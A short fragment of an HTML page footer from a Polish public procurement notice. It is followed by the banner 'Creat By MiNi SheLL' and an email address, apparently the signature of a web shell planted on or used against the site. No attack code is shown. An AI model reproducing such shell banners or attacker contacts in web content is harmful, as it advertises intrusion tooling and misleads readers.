Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com